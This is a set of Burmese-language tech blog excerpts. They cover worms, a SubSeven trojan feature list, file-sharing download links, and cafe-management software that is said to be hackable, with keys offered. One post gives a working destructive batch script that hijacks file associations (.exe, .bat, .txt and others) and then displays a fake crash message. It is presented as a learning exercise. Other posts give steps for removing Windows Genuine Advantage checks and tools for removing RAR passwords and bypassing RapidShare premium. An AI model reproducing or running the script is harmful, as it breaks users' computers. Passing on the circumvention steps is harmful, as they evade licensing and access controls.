sithuphyoworm ဆိုတာကတော့ တစ်ခြားvirus တွေလိုဘဲသူတို့ကိုသူတို့ပြနပြီးတော့ပွားနိုင်ပါတယ်။self execution ပေါ့ဗျာ။နောက်ပြီးတော့ function ၂ခုနဲ့အလုပ်လုပ်တယ်။ ဥပမာဗျာ global.exe ဆိုတဲံvirus ကတော့ system32 ထဲမှာ svchost.exe နဲ့ global.exe ဆိုပြီးတော့နှစ်ခုအလုပ်လုပ်ပါတယ်။ကျနော်တို့က svchost.exe ကို သတ်လိုက်ရင် global.exe ဆိုတာကအလုပ်လုပ်ပြန်ရော။တစ်ခုကိုတစ်ခုအလုပ်လုပ်စေပါတယ်။ဒါမှမဟုတ်ရင် global.exe ကိုသတ်လိုက်ရင် svchost.exe က အလုပ်လုပ်ပြန်ရော။အဲ့လိုမျိိုုးအလုပ်လုပ်တာပါ။ ဘာကိုဆိုးကျိုးဖြစ်စေလဲဆိုတော့file တွေကိုပွားထုတ်လိုက်ပါတယ်။ ဒီတော့စက်ကြီးကသုံးရတာလေးလာမယ်။ နောက်ပြီးတော့ program တွေကိုတစ်ခါဖွင့်ရင်တစ်ခါ အလုပ်လုပ်အောင်လုပ်ထားတော့မလိုအပ်ဘဲစက်ကအလုပ်လုပ်နေတာမျိုး ။ သုံးမရတာမျိုုး ။ worm အများစု ကတော့ network ကိုattack လုပ်ပါတယ်။ serverတို့ router တို့ကိုအလုပ်မလုပ်စေတာမျိုုး sharing လုပ်လိုု့မရတာမျိုူးတွေဖြစ်လာပါတယ်။ IP Address ပြောင်း လိုက်တာမျိုူးတွေဖြစ်လာပါတယ်၊ MY DOOM […]
ကျနော်တို့ computerတွေမှာcopyကူးတာကိုနှေးတယ်လို့ ထင်ရင် tera copy ဆိုတဲ့ copier softwareလေးသုံးကြည့် ပါဗျာ။ တော်တော်လေးကိုမြန်တာဗျ။ ဒါပေမယ့် file size သေးရင်တော့ သိပ်မသိရပါဘူး။ file size ကြီးကြီး တွေ copy ကူးကြည့် ပါလား။window မှာcopy ကူးတာထက်2ဆ3ဆလောက်ပိုမြန်တယ်ဗျ။ သုံးရတာလည်းလွယ်ပါတယ်ဗျာ။ အပန်းမကြီးဘူးဆိုရင် စမ်းသုံးကြည့် ပါလား။ မိတ်ဆွေတို့ ရဲ့ computer copy ကူးတာမြန်သွားတော့ အချိန်ကုန်သက်သာတာပေါ့ ဗျာ။ rapid share ကနေတင်ထားပေးပါတယ်။linkကတော့ http://rapidshare.com/files/373847547/tera_copy.rar.html
ကျနော်တို့အင်တာနက်ဆိုင်အတော်များများမှာတော့cafezee software ကိုသုံးကြတာတွေ့ရပါတယ်။ဒါပေမယ့် cafezee software ကတော့ handycafe လောက်တော့သိပ်ပြီးတော့ ထိန်းချုပ်မှုမကောင်းဘုူးဗျ။ ပြီးတော့cafezee ကို hack လုပ်လို့ရတယ်လေ။ ဒါပေမယ့် handycafe ကိုတော့ hack လို့မရဘူးဗျ။အဲံလိုကွာခြားချက်လေးတွေပေါ့ဗျာ။ နောက်ပြီးတော့ remote management ရတယ်ဆိုတော့အဆင်ပြေတယ် လေ။ customer တွေရဲ့ပြဿနာတွေကို ထသွားစရာမလိုဘဲနဲ့ server ကနေလှမ်းပြီးတော့ဖြေရှင်းလို့ရတယ်။ usb protection တွေလည်းပါတယ်။သုံးရတာလဲလွယ်တော့အဆင်ပြေတာပေါ့။ ကျနော်တို့ မပေးဖွင့် စေချင်တဲ့ drive တွေ၊ ပြီးတော့settings တွေကိုလည်းပိတ်ထားလို့ရတယ်။ကျနော်တို့ ကွန်ပြူတာတွေကိုအလုပ်ရှုပ်ခံပြီးတော့ဟိုပိတ်ဒီပိတ်လုပ်စရာမလိုတော့ဘူး။server ကနေထိုင်ပြီးတော့ control လုပ်ရုံဘဲ။ မချိန်မကုန်တော့ဘူးပေါ့။နောက်ပြီးတော့တစ်ခြားအားသာချက်တွေရှိပါသေးတယ်။ www.handycafe.com မှာdownload လုပ်နိုင်ပါတယ်။လိုချင်တဲံလူတွေဒေါင်းလိုက်ပေါ့။အဆင်မပြေရင်ပြန်ပြောပေါ့။ကျနော် upload တင်ပေးပါ့မယ်။လောလောဆယ်အချိန်မရသေးလို့ မတင်သေးတာပါ။key အဆင်မပြေရင်ပြောပါ။တင်ပေးပါ့မယ်ခင်ဗျာ။
ကျနော်win rar password remover လေးကိုရှယ်လိုက်ပါတယ်။rar file တွေကိုpassword ဖြုတ်နိုင်ပါတယ်။ သူငယ်ချင်းတို့ rar file တွေdownload လုပ်လိုက်ရင်အချို့တွေကpassword တွေတောင်းရင်password ထည့်ပေးရတော့ PWသိရင်တော့okတာပေါ့။PWမသိရင်တော့ရွာလည်ပြီ။ဒီတော့ password ကိုကျော်ပြီးဖွင့်မဲ့ software လေးလိုလာပြီပေါ့ဗျာ။ အဲ့ဒါကတော့ winrar password remover လေးပါ။ http://rapidshare.com/files/376801112/rarpwrecover.zip.html မှာdownload လုပ်နိုင်ပါတယ်။ http://ifile.it/i9q7a5r/rarpwrecover.zip မှာလည်းဒေါင်းနိုင်ပါတယ်။သူကpassword ပေးထားတဲံအပေါ်မူတည်ပြီးတော့ကြာပါတယ်။password များလေရှာရတာကြာလေပေါ့။ အသုံးဝင်မယ်လို့ထင်ပါတယ်။နောက်လဲကျနော်အသုံးဝင်မယ့်software တွေ တင်ပေးပါ့မယ်။
ကျနော်rapid share ကနေpremium account မလိုဘဲဒေါင်းတဲံ့နည်းရှယ်လိုက်ပါတယ်။သူငယ်ချင်းတို့ရဲ့ rapid share ကနေဒေါင်းချင်တဲံ့လင့်လေးကိုcopy ပြီး တော့ http://rsplg.com/ မှာ paste လုပ်ပြီးတော့လင့်ကိုgenerate လုပ်လိုက်ပါ။ ူလင့်လေးထွက်လာပါမယ်။အဲံ့ဒီကနေဒေါင်းလို့ရသလို internet download manager မှာ လင့်ကိုကော်ပီကူးပြီးတော့လဲဒေါင်းနိုင်ပါတယ်။အားလုံးအဆင်ပြေပါစေဗျာ။
ကျနော်ဒီပိုစ်လေးကိုတင်တာbatch file ကိုလေ့လာနေတဲံသူအတွက်ရေးတာပါ။သဘောတရားလေးပေါ့ဗျာ။ဖျက်လိုဖျက်ဆီးချင်တဲ့ သဘောနဲ့ရေးတာမဟုတ်ပါဘူး။လေ့လာနေတဲ့သူတွေအတွက်အကျိုးရှိပါတယ်။ကဲကျနော်တို့စလိုက်ရအောင်ဗျာ။ ကျနော်တို့notepad ကိုဖွင့် လိုက်ပါ။ ပြီးရင် @echo off assoc .mp3=jpegfile assoc .txt=pngfile assoc .exe=regfile assoc .html=batfile assoc .bat=regfile assoc .reg=sysfile assoc .doc=dllfile msg * have fun! @echo off color 1e @echo Your system has been crashed ! @echo Contact to your system administrator pause exit ဆိုပြီးရိုက်လိုက်ပေါ့ ။သိပ်ပြီးတော့လဲလက်တည့် မစမ်းနဲ့ ဦးနော်။ line number 4ကassoc .exe=regfile […]
SubsevenLegend ဆိုတဲ့trojan ကတော့ကျနော်တို့ ကွန်ပျူတာတွေကိုအမျိုးမျိုးဒုက္ခပေးနေတဲ့ trojan ပါ။သူကတော့ user information တွေကိုုထိန်းချုပ်သူထံသို့ပို့ပေးပါတယ်။ သူ့ကိုထိန်းချုပ်တဲ့လူကနေပြီးတော့မှ user တွေရဲ့ ဒေတာတွေ ကို ဖျက်တာ။အသစ်ထည့်တာ။message ပို့တာနဲ့တစ်ခြားလုပ်ဆောင်ချက်တွေကိုလုပ်ပါတယ်။ သူ့ရဲ့ လုပ်ဆောင်ချက်တွေကို ယေဘူယျအားဖြင့်၂၆ချက်ရှိပါတယ်။ ၁။ user ဆီကိုmessage ပို့နိုင်ပါတယ်သို့မဟုတ်မေးခွန်းတွေမေးပါတယ်။ ၂။ browser တစ်ခုထဲမှာဘဲ ကြိုက်တဲ့site ကိုသွားလို့ရပါတယ်။browser ကိုပါထိန်းချုပ်လို့ရပါတယ်။ ၃။ start menu ကိုဖျောက်လို့ရပါတယ်။ ၄။ screen shot ရိုက်လို့ရပါတယ်။user ကဘာလုပ်နေလဲပေါ့။ ၅။ keyboard ကိုdisable လုပ်လို့ရပါတယ်။ ၆။ Trojan horse ထိထားတဲံ့ user နဲ့ Chat လုပ်လို့ရပါတယ်။ ၇။ sound settings တွေပြင်လို့ရပါတယ်။ ၈။ […]
ကျနော်အခုတင်ပြမှာကတော့window not genuine ကိုဘယ်လိုဖြေရှင်းမလဲဆိုတာကိုပါ။ computer နောက်ခံbackground မှာ screen အဖဲကြီးနဲ့ပေါ်လာပြီးတော့ window not genuine ဆိုပြီးတော့ပေါ်လာပါတယ်။အဲ့ဒါကဘာကြောင့်ဖြစ်ရလဲဆိုတော့automatic update ကိုပေးထားရင် ဖြစ်တတ်ပါတယ်။အဲ့ဒီချိန်မှာmicrosoft ရဲ့window genuine ဖြစ်မဖြစ်စောင့်ကြည့်တဲ့software လေးနဲ့တွေ့လို့ဖြစ်သွားတာပါ။ wgatray.exe ဆိုတဲ့software လေးပါ။ taskmanager ကနေပြီးတော ့wgatray.exe ကိုend processလုပ်ကြည့်ပါ။မရတော့ပါဘူး။ ဒါကြောင့် computerကို restartချပြီးsafemode နဲ့ ဝင်ပါ။ ပြီးရင်တော့ C:\Windows\System32. မှာwgatray.exe ကိုရှာပါ။တွေ့ရင်တော့delete လိုက်ပေါ့။C:\Windows\System32\dllcache. ကိုလည်းဖျက်ပစ်။အရှင်မထားနဲံ့ ဖျက်ပစ်။ပြီးရင် runထဲက နေregeditဆိုပြီးရိုက် ။HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Current Version\Winlogon\Notify ထိသွားပါ။notify ကိုထပ်ပြီးexpand လုပ်လိုက်ရင်wgalogonဆိုတာကိုတွေ့ လိမ့်မယ်။wgalogon ကိုright clickထောက်ပြီး delete လုပ်လိုက်ရုံဘဲ။ ဒါဆိုရင်ပွဲပြီးပြီ။ပွဲပြီးပြီဆိုတိုင်း automatic update […]
ယခုကျနော်တင်ပြမယ့်ပိုစ့်လေးကတော့autoplay function ကိုဘယ်လိုပိတ်ရမလဲဆိုတာကိုတင်လိုက်ပါတယ်။autoplay function ကိုမပိတ်ထားရင်တော့ကျနော်တို့ရဲ့ computer မှာvirus ဝင်ဖို့လမ်းစပေးနေသလိုဖြစ်နေတာပေါ့။အခုဘဲကျနော်တို့ရဲ့ကွန်ပြူတာမှာautoplay function ပိတ်ကြရအောင်။ Start–>Run –>regedit ရိုက်ထည့်ပြီးဖွင့်ပါ.. Regedit ပေါ်လာပါမည် .. HKEY_LOCAL_MACHINE –>System–>CurrentControlSet–>Service –>Cdrom ကိုရွေးပါ။ညာဘက်တွင် AutoRun အမည်ကိုရှာပါ.. double click နှိပ်ပါ။EditDWORD Value ၏ value data ကို 0ဟုပေးလိုက်ပါ။ AutoRun ကိုမတွေ့ဘူးဆိုလျှင်ကျနော်တို့setting တွေအနည်းငယ်ပြင်ပေးရပါမယ်။ menu bar က Edit–>New–>DWORDValue ကိုဖွင့်ပါ.. Registry Editor ညာဘက် boxတွင် regisrty value (New Value#1) တစ်ခုပေါ်လာပါမည်။၎င်းတွင်autorun ဟုရိုက်ထည့်လိုက်ပါ။double -click ပေပြီးeditDWORD Value ကို0ပေးလိုက်ပါ။1ဆိုတာကတော့enable ပါ။0ကတော့disable ပါ။ဒါကတော့autorun […]